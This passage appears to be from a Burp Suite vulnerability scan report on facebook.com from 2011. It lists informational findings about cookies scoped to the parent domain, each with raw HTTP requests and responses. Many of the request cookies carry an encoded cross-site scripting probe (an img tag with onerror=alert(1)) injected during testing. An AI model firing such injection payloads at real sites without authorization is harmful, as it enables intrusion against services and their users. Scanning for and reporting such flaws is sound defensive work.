Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.37
Connection: close
Date: Thu, 05 May 2011 11:40:16 GMT
Content-Length: 170476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.25. http://www.facebook.com/ajax/intl/language_dialog.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.123
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 41058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.26. http://www.facebook.com/ajax/reg_birthday_help.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/reg_birthday_help.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/reg_birthday_help.php?__a=1&__d=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 707
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.163.55
X-Cnection: close
Date: Thu, 05 May 2011 11:43:24 GMT

for (;;);{"__ar":1,"payload":{"secure":false,"title":{"__html":"Why do I need to provide my birthday?"},"className":"birthday_warning_popup","body":{"__html":"Facebook requires all users to provide th
...[SNIP]...

10.27. http://www.facebook.com/ajax/register/logging.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/register/logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ajax/register/logging.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
Origin: http://www.facebook.com
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613617025%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613618111%2C%22act%22%2C1304613617025%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fajax%2Freg_birthday_help.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C437%2C508%2C12%2C981%2C16%5D
Content-Length: 111

action=postload_focus&reg_instance=nozCTU1UnNH2U_CPdhUk4wOq&abtest_registration_group=1&fb_dtsg=yeP5w&lsd=zTWKd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.198.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:30 GMT

for (;;);{"__ar":1,"payload":null}

10.28. http://www.facebook.com/aol

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aol

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.63
Connection: close
Date: Thu, 05 May 2011 11:40:09 GMT
Content-Length: 39885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.29. http://www.facebook.com/aolradio

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aolradio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.33
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.30. http://www.facebook.com/badges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.119
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 0


10.31. http://www.facebook.com/burkerkink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.32. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.222.101
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 0


10.33. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.34. http://www.facebook.com/deedee.perez1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.35. http://www.facebook.com/directory/pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.36. http://www.facebook.com/directory/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.37. http://www.facebook.com/facebook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
